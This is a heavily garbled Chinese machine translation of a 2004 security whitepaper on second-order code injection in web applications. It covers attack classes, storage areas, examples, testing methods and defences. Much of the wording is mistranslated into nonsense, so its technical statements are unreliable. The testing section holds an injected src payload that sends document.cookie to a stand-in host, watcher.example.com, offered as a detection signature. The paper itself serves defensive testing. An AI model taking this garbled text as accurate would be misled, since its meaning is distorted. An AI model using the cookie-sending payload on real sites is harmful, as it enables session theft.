第二- 次序密码注入攻击
先进的密码注入技术和测试的程序
摘要
许多形式的密码注入对准网络的申请 ( 举例来说跨位置
手写体和 SQL 注入) 仰赖植入的密码即时实行到
出自攻击的进位 ( 举例来说偷使用者的现在会议数据或运行一修正
SQL 质疑). 在一些情形中它可能让一个攻击者是可能的注射他们的怀恶意的密码
进入一个可能在较后的日期或时间被运行的数据储藏区域之内。 仰赖那
申请的性质和方法怀恶意的数据被储存或提出, 攻击者
可能能够引导二分之一-次序密码注入攻击。
一个第二次序的密码注入攻击能被归类为程序在怀恶意的密码
被注入一个网络的申请并且不立刻运行, 但是改为被储存
藉着申请 (举例来说暂时贮藏,伐木,储存在一个数据库中) 然后比较迟的
被受害人取回, 提出而且运行。
第二- 次序密码注入攻击
第二- 次序密码注入攻击..........................................................1
第 1 节: 背景.......................................................................................3
第 2 节: 理解第二-次序密码注入.................................4
2.1. 分类第二- 次序编码插入.............................4
2.2. 储藏区域..........................................................................5
2.3. 例子的理解......................................................5
2.3.1. 例子: 分享了搜寻标准 (班级 1 攻击)......................5
2.3.2. 例子: 网站统计学 (班级 2 攻击)..............................5
2.3.3. 例子: 客户服务 (班级 3 攻击)............................6
2.3.4. 例子: 第二个次序的 SQL 注入 (班级 4 攻击)..............6
第 3 节: 为易受伤的测试.............................................................7
3.1. 自动化了发现...............................................................7
3.2. 手册技术.................................................................7
第 4 节: 保护反对第二- 次序编码注入..........................9
4.1. 攻击的可能性..........................................................9
4.2. 攻击的冲击..............................................................10
4.3. 生意危险......................................................................10
第 5 节: 结论....................................................................................11
5.1. 资源..............................................................................11
第 1 节: 背景
在多数的情形中, 引导一个密码注入攻击的攻击者的目的反对
一个网络的申请是立刻引起来自一个被对准的主人一个回应或另外地
提名的了受害人。 为密码注入攻击的最通常的技术是:
HTML 埋入 ¨ C 增加将会是的额外以 HTML 为基础的内容程序
在接受者的浏览器中提出并且假装来自易受伤害人
申请。 攻击的这一个类型时常用来引导虚拟伤毁外表
网站, 或对现在的有义务的和破坏名誉的内容当做来自个别项目
申请.( 举例来说错误的新闻文章设计降低一个组织股价)
跨位置手写体 - 普遍过去一直引起手写体密码的实行
(藉着攻击者控制) 在次序偷来自受害人的数据 ( 举例来说现在
登录会议数据) 或引起 Troy 马软件的安装那
稍后能用来轮流受害人主人的完全控制。
SQL 注入 ¨ C 在数据里面注射 SQL 语言密码请求那的程序
造成申请的后端数据库伺候器也投降机密的
数据, 或引起在数据库上的怀恶意的手写体内容的实行那
造成一个主人妥协。
缓冲溢值 ¨ C 递送一个可能包含的特定负载量的程序
二进位的数据或个性将会被同样地解释的线。 资讯科技被设计到
影响申请的记忆储藏区域并且可能地引起否认
维修攻击或运行在主人妥协之上被集中焦点在的怀恶意的指令。
文件包括 ¨ C 一个允许一个攻击者注射怀恶意的密码通常的易受伤
如此的如文件位置叁考或结构变数进入系统之内申请那可以
被主机租贷申请或基础解释操作系统。 典型地过去一直
引起被设计妥协处理主人的怀恶意密码的伺服端实行。
在途中也有若干的影响力密码注入攻击可能被引导。
举例来说:
时间安排 ¨ C 与密码注入有关的攻击将会被引导吗
同时地或非同步地藉着申请? 举例来说立刻在即时的, 当做
一个背景子程序, 等等。
位置 ¨ C 哪里在申请系统内各部分里面密码注入将会对准吗?
举例来说客户,伺候器,中级的伺候器, 等等。
环境 ¨ C 在之下环境的变数将会密码注入是
运行? 举例来说客户的浏览器, 客户支援工作站,管理人
控制台, 等等。
来源 ¨ C 从区域在申请里面密码注入将会被安装吗
从? 举例来说一个被证明的客户, 在数据库, 等等里面储存了数据。
为密码注入和多数有许多其他的流行递送机制
对特别的技术交换,"第一-命令" 攻击典型地被引导在即时的
或可能被立刻查证/ 开始。
第二个次序的注入典型地攻击不立刻发生, 而且不可能找一个受害人
许多天或数个月。 在许多情况最初易受伤害的申请和
允许了密码插入, 申请不是刺激攻击。
第 2 节: 理解第二- 次序密码注入
如订制的网络申请变得更复杂的而且整合进入永远之内
复杂的操作环境, 有一个逐渐增加的趋势再处理委托数据
而且将它的使用非常好的化。 除此之外, 有一个增加的趋势增加一个申请使用者
" 经验 " 藉由提供历史的或以统计上来看基础的数据。
这个再处理和替代选择客户的用法委托了数据那里是的方法一
增加的可能性满足的查证了 " 保险箱 " 因为一个申请成份可能有
在另外的里面料想不到的结果。
第二- 次序密码注入是被注入一个申请的怀恶意密码的实现被
一个攻击者, 但是不立刻藉着申请刺激。 在许多情况, 受害人
攻击平坦的不可能使用相同的申请攻击者注射了他们的密码。
2.1. 分类第二- 次序编码插入
关于第一流的密码注入易受伤, 有若干的种类或班级
攻击矢量。 为第二- 次序编码注入易受伤,最可适用班级
是:
班级 1: 以频率为基础的主要申请 ¨ C 这一个班级包括申请那
呈现再加工的客户使用统计的频率模型的请求。 例子
包括提供的申请功能性为 " 顶端 10 大部分搜寻了项目"", 大部分
通常的使用者请求 "," 其他的观众推荐 "," 昨天大部分流行的
文章", 等等攻击在这一个班级里面时常对准其他提名候选人的预选会的使用者
申请。
班级 2: 以频率为基础的中级申请 ¨ C 这一个班级包括申请
那不最初接受被注射的密码, 但是改为程序服从从
一个申请而且为统计的检讨表现这材料。 例子包括
检讨网的申请- 请求或错误圆木而且呈现统计的数据
如此的当做 " 大部分流行的网浏览器 "," 大部分通常的搜寻片语"", 顶端 50
referrers"," 时常发生的失败请求的大部分", 在这一个班级里面的等等攻击典型地
对准系统管理人。
班级 3: 中级的支持申请 ¨ C 这一个班级包括习惯于的申请
在内部支持主要的申请。 这些中级的支持申请
典型地看或操纵被主要的申请获得的数据, 和时常
信赖数据是安心的或已经消毒。 在大部份的情形下, 第二次的
申请用来看或维持被客户委托的数据唯一的是
看得见的/适用于客户和拥有者组织。 例子包括
被帮忙- 书桌操作员和电话用的申请支援代理到
处理/ 更新客户记录。 在这一个班级里面的攻击典型地对准内在的
申请使用者和攻击使活动可能透过社会的工程学被加速
如此的矢量当做打电话给支持线而且说 " 我的住址细节似乎当
错误的而且我不能改变他们,你能将他们换成我吗".
班级 4: 成瀑布落下这一个班级包括申请的服从申请 ¨ C( 或
紧要关头的申请成份) 在里面利用多样的客户服从一
独身者处理陈述。 举例来说,这可能包括需要的申请
访客产生一个包括住址数据的使用者帐户。 住址
数据然后作为申请动作如此的当做 " 接近找最靠近的商店
我 "," 位于去我的学校其他的人", 等等攻击在这一个班级里面
典型地利用 SQL 密码陈述操纵搜寻请求和
结果目标逆时针方向转变了数据库资源。
2.2. 储藏区域
注射密码可能被储存时常使用多种方法 , 和储藏技术意志
听写攻击的班级。 为密码储藏有三个种类:
1. 举例来说早先的暂时储藏 ¨ C 申请搜寻标准和另外地
贮藏了数据。
2. 短期的储藏 ¨ C 举例来说数据储存在每日的/ 每周的圆木中是
不规则地或结束检讨-书面的/时常清净。
3. 长期的储藏 ¨ C 举例来说数据长备地储存在逆时针方向转变的系统中那
一定用手被移动。
2.3. 例子的理解
最容易的方法了解这些复杂的攻击经过例子。
2.3.1. 例子: 分享了搜寻标准 (班级 1 攻击)
许多流行的网申请允许访客寻找特定的内容和展览
把调查结果相配回使用者。 在传统的密码注入攻击中,一个攻击者可能是
聪明的制定一个特定的网址以滥用申请能力接受使用者定义的
在联编之后搜寻标准和一怀恶意的攻击任何人飞机 ( 举例来说跨位置
手写体偷使用者会议数据). 如果申请搜寻不能够被转
进入一个怀恶意的网址之内,手写体攻击的跨位置不是特别地有用的为感人的
其他任何人超过攻击者他自己或她自己。
逐渐通常是 " 大部分流行的搜寻 "," 早先的搜寻"", 其他的访客也
寻找::****改为"搜寻功能性.大体上, 数据
呈现给搜寻使用者在从暂时被处理- 储存或动态地- 贮藏
搜寻请求。 经过搜寻数据的小心处理和由于重复的
服从,一个攻击者可能能够影响这个广大的搜寻功能性。 这
第二-次序密码注入攻击会供作牺牲网申请的任意使用者, 和
可能用来代替看得见的位置内容 ( 举例来说假造一伤毁外表或呈现一 " 请
再登录" 接口取得使用者国书).
2.3.2. 例子: 网站统计学 (班级 2 攻击)
流行的大部分网伺候器申请考虑到客户浏览器的先进砍伐原木
请求。 这些圆木,在一个最小量, 通常包含请求的日期/ 时间,来源
请求 ( 举例来说客户浏览器的 IP 住址), 类型和请求的性质
(举例来说一个 HTTP 得到对一个特别的网址或文件的请求), 客户浏览器的类型 ( 举例来说 Mozilla
可并立的) 和 referrer 网址。
为了帮助管理而且调节网站,许多管理人程序这些网伐木使用
自动化工具设计产生有价值的访客统计学。 在许多情况, 这些
统计的分析工具提供能被看来自一张网的 " 活的 " 的以 HTML 为基础的输出-
基础的管理人接口。 这是特别地如此以处理的网际服务主机租贷服务。
因为提供网络的管理人接触位置统计学的网站, 它时常是
可能的引导一个第二次序的密码被设计抢劫涌流的注入攻击
管理人会议。 因为两者的 referrer( 也就是 HTTP 提到: 领域) 和那
浏览器类型 (也就是 HTTP 浏览器-类型: 领域)被客户浏览器定义, 它是
不是困难让一个攻击者以包含怀恶意的密码内容修正这些价值。
许多统计的产生器包裹能够 sanitising 或起模危险的
满足的从伐木的网址数据,他们相当时常无法提供相似的保护反对怀恶意的
密码在里面埋入这些另外的伐木了领域。
第二- 次序密码注入进入这些管理人之内位置- 统计学的页是特别地
危险的, 如同最时常会议数据的窃盗将会使攻击者能够完全地得到一样
管理人对位置内容的控制人。 除此之外, 藉由许多流行的网际服务主机租贷
包裹, 提供这些位置统计学的管理人接口也提供通路给
附加的服务行政 , 像是网-邮件,文件传送协议服务和 DNS 管理。
2.3.3. 例子: 客户服务 (班级 3 攻击)
当创造他们的帐户时候,许多在线申请允许使用者委托个人的细节。
在大部份的情形下,进入这些领域之内被委托的任何怀恶意的内容只会影响攻击者
他自己 ( 没也就是其他的申请使用者会正常地被允许见到这些细节) ¨ C
结果时常输入 sanitisation 是最小的。
然而,如同组织继续使再循环发展技术一样,它不是不寻常的
对于内在的 helpdesk 联成一组,否则客户维修部门使用网络的技术
看客户记录。 因此,如果攻击者是在一笔数据里面插入怀恶意的密码
领域, 任何人稍后检讨领域会导致密码运行。 一个攻击者可能
选择藉由使用组织客户支持电话向前加速事物
数而且要求他们检讨或改变他的记录 ¨ C 如此开始攻击。
攻击的这一个类型的最怀恶意使用是引起 Troy 马的安装
在客户上的软件维修系统, 而且提供一条路径给攻击者进入那之内
组织网络。
2.3.4. 例子: 第二个次序的 SQL 注入 (班级 4 攻击)
读者被推荐检讨克里斯 Anley''s 的报告 " SQL 的先进 SQL 注入
伺候器申请".
第 3 节: 为易受伤的测试
通常密码注入矢量的立即攻击性质意谓他们时常是
非常容易的发现。 藉由委托一个联合的攻击签字 ( 举例来说:
<手写体> 注意 ('' 密码注入'')</手写体>) 而且观察伺候器回应,程序
发现易受伤害的申请成份能容易地被自动化。 因为网
运行某种安全 sanitisation 或注射的密码封包的申请,
服从数以百计不同地改为暗码了攻击线 ( 举例来说更换那
"<" 个性由于 %u003C)能时常脱帽致敬一个潜在的密码注入攻击矢量, 和是
理想地自动化。
另一方面, 测试为第二- 次序密码注入时常非常困难和可能
需要通路到逆时针方向转变数据分析工具识别一个申请是否是事实上
易受伤害的。 仰赖自然和班级第二-次序编码注入, 那
潜能攻击可以在若干的联合申请里面或随时发生
在~之后数据服从。 结果,现在世代的自动化的网-
申请评估工具识别大部份这些是不充分的和无能力的
易受伤。
因为任何的 " 测试签字"( 也就是可能容易地被转换的非怀恶意的线进入一之内真正的
攻击) 委托到申请不能够被在后来的伺候器回应里面查证,
一个其它可能的策略一定被为易受伤发现采用。
3.1. 自动化了发现
自动化了第二次序密码的发现注入是主要适当计时延迟的困难 ¨ C
而且替代选择路径位置。 克服一些问题,被自动化的工具
必须:
能够委托古典密码注入的所有平常攻击交换
攻击。
在里面包括每种数据服从一个能向后地被追踪的独特标识符到一
独特的攻击矢量,发生,插入点和来源的时候。
能够重复地委托相同的攻击数据 ( 举例来说 100 到 10,000个次 ¨ C
家眷在如何之上时常用申请是).
重复地能够映射 ( 举例来说 spydering) 一个网络的申请在
不同的时代发现任何的改变了页包含那先前委托
数据。
一项工具事业这些工作可能地能够发现大多数的班级 1&4 秒-
命令密码插入易受伤。
为了要发现班级 2&3 密码插入易受伤的一些表格, 那自动化
测试申请一定维持一个听服务而且观察的请求一广大的
时期.(这可能范围从数小时穿越排到数个星期) 理想地这听服务会是
英特网-范围。
听服务的这目是记录后来的申请/ 浏览器请求
被命名的资源在那先前委托编码注入签字。 举例来说, 一些
被自动化的密码插入可能包含下列的数据:
src="http:// watcher.example.com/test.htm?sig=677823676& 饼干="%20+%20 文件。饼干
" watcher.example.com" 是听服务的位置哪里,而且 " sig" 是独特人哪里
为攻击签字的标识符 ( 包括日期,时间,插入位置和来源那
数据服从).
3.2. 手册技术
当自动化发现技术的时候可能习惯于发现第二- 次序密码注入
易受伤, 人工的研究技术可能证明一更快和多
无遗漏的技术。 不像古典的申请安全评估技术, 安全
专业人士将会需要比较棒的如果他们要脱帽致敬,整合的通路逆时针方向转变了系统
所有的攻击矢量。
确定发现这些易受伤,安全专业人士的最好视野和
申请/ 环境拥有者应该:
确定网络图表和申请数据流程图表是可得的
在测试的时候。
检查所有的短期和长期的数据储藏区域寻找易受伤测试的痕迹
在测试各处不变地串起。
用手检讨可能的中级支持申请存取那储存
数据。
了解程序过去一直显示的被逆时针方向转变的技术和手册或
操纵被储存的数据。
产生一个 ''收听者'' 维修有能力的发现被做的任何请求被易受伤害的
为数据资源的系统在测试里面包含串起 ¨ C 和保存这
超过测试的期间长度的申请赛跑。 这听服务
应该在组织系统内各部分内和可接近的从任何的
网络分割。
第 4 节: 保护反对第二- 次序编码
注入
保护的程序反对第二- 次序密码注入攻击几乎同一
对再调停忠告对于任何的古典作品密码注入攻击。 这再调停忠告和
对安全的附着最好练习包括:
不要信赖使用者委托的数据。
客户- 边的数据 sanitisation 总是能被击败。
总是在伺服端消毒数据。
使用一个优良者名单达成的方式 sanitising 数据 ( 也就是不许假设值的每件事物, 和
明确地列举被允许或认为 " 保险箱 " 的数据个性).
小心数据显着的 " 保险箱 " 因为一个申请不可能是另外一的保险箱
申请/成份。
取回的每个申请储存了数据 ( 尤其如果数据可能到是
藉着使用者供应) 一定在处理之前应用它自己的数据 sanitisation 程序
它更进一步。
理想地边界确认程序应该用来确定那笔所有的数据
适当地在和里面申请成份之间处理被有效。
确定那一个发展职员包括适当的数据 sanitisation 常式在所有的
申请成份和附加的服务。
用潜在的教育职员接触被使用者委托的数据 ( 举例来说帮忙书桌和
客户支持人员) 在该如何回应一个可能的攻击之上 ( 举例来说谁应该
连络如果可疑的东西偶然发现他们的荧屏).
确定那一个桌面保护代理人 , 像是反病毒,个人的防火墙和身份证
被安装,而且他们的签字是最新的。
确定适当的出口过滤和外面- 范围阻断适当地是在所有的之上
网络分割。
4.1. 攻击的可能性
目前,成功攻击的可能性是低点。 这是适当的到若干的
因素:
古典的 (第一-次序) 密码注入攻击是如此的通常以致于, 当与
第二-次序密码注入,攻击的比较可能性是低点。
第一的次序密码注入表现那 " 低点悬挂水果" 申请安全
世界。 结果它是不直到这些第一- 次序密码注入点很困难到
在一个特别的申请里面发现攻击者可能完全对准一
使用这些的组织攻击矢量。
在许多情况第二- 次序编码注入一定被做 " 盲人 " ¨ C 也就是攻击者
找寻滥用逆时针方向转变没有系统的之前知识的功能性。 这
它难以知道一个攻击是否可能是成功的方法。
事实攻击的成功不可能被知道许多小时以来, 每天或
数个星期, 意谓一个攻击者可能试而且用尽其他的攻击矢量那
首先提供立即的确认。
资讯科技是预期的攻击可能性将会如组织的未来数年的增加
安装系统比较好的发现并且保护他们免于第一- 次序密码注入攻击 ¨ C
但是对发现较多的合成物是无能力的第二-次序攻击矢量。 除此之外, 那
能力委托攻击密码进申请的短期或长期的数据储藏区域
它时常对 " 种子 " 是可能的一个申请的方法在~之前攻击 ¨ C 使它成为理想
为专业的罪犯无线电诱导。
4.2. 攻击的冲击
第二次序密码的冲击注入攻击容易是比第一- 次序棒的密码
注入。 这相当地是适当的到:
潜能对准申请的管理人和那支援
环境。
能力对准非技术上的资源 , 像是客户支持职员。
潜能影响组织的内在主人 ( 举例来说帮忙- 书桌的工作站
而且数据库).
对 " 种子 " 的能力和攻击的申请数据储藏区域密码在~之前
开发。
4.3. 生意危险
与生意危险有关的第二- 次序密码注入易受伤是困难的到
评估。 成功开发的现在可能是相对地低, 冲击
开发时常非常高。 结果第二- 次序编码注入易受伤
表现一种媒体-到-对生意连续性和数据正直的高危险。
这一个危险因子可能在往后的几年期间如工具和技术帮忙增加
首先镇静-次序密码注入易受伤, 但是比较不有可能镇静第二- 次序
编码注入易受伤。 除此之外, 如逆时针方向转变的系统变得更复杂的
而且部份数据更自由,另外的攻击矢量将会变成可得。
第 5 节: 结论
古典的密码注入易受伤能时常被发现使用自动化了工具或
技术。 然而, 如申请以更多变得更复杂的而且整合
逆时针方向转变了系统多数不直接地回应怀恶意的密码注入, 标准
易受伤评估工具发现是无能力的第二- 次序密码注入
提供错误的安慰给仰赖他们的组织易受伤 ¨ C。
结果一广大的自动化测试的方法学是发现这些所必要者
易受伤。
不幸地, 自动化工具将会无法能够发现所有的第二- 次序密码注入
易受伤。 相反的,安全专业人士一定密切地与申请合作
发展和支持装填 ¨ C 使用数据处理图表和
附加的申请 ¨ C 的理解如果他们即将逐渐地发现而且避免这些
流行的攻击矢量。
组织一定确定那个所有的主要数据处理成份和中级的
申请能够 sanitising 他们实际上使用的数据, 和不固有地信托的
来自其他的 " 处理 " 的数据来源。
5.1. 资源
" HTML 密码注入和跨位置手写体 " , Gunter Ollmann,2001
" SQL 伺候器申请的先进 SQL 注入 " ,克里斯 Anley,2002
有关下代安全软件 (NGS)
NGS 是专家安全软件和高科技的信赖供应者商议的服务到
在世界各处的大企业环境和政府。 投票 " 最好在那
世界" 为易受伤研究和发现在 2003 年,公司将它的精力集中在
先进的安全解决奋斗今天的威胁。 在这能力 NGS 中如顾问的行为在
易受伤发行到沟通- 电子学的安全团体 (CESG) 那
在英国和国民负责计算机安全的政府部门
系统内各部分安全共任命中心 (NISCC). NGS 维持最大的渗透
测试和被清除的检查安全在 EMEA 中联成一组。 在 2001 年发现, NGS 被总部
在萨顿,萨里式游览马车, 藉由在苏格兰的研究办公室 , 和和客户的工厂在一之上真实地
国际的水平。
有关 NGS 洞察力安全研究 (NISR)
NGS 洞察力安全研究队正在积极地研究和帮助固定安全
在流行的现货产品产品中有缺点。 身为易受伤发现的世界领袖, NISR
释放的安全情况报告比任何其他的商业安全多研究团体在那
世界。
版权 2004 年十一月, Gunter Ollmann。 全世界的版权所有。 其他的标志和商标名是那
他们的分别拥有者的财产,依照指出。 所有的标志被用于没有意图的编辑上下文
侵权。
11 http:// www.ngssoftware.com 的 NGSSoftware 洞察力安全研究第 11 页
http://netadmin.77169.com/HTML/20041128051900.html
关注我们
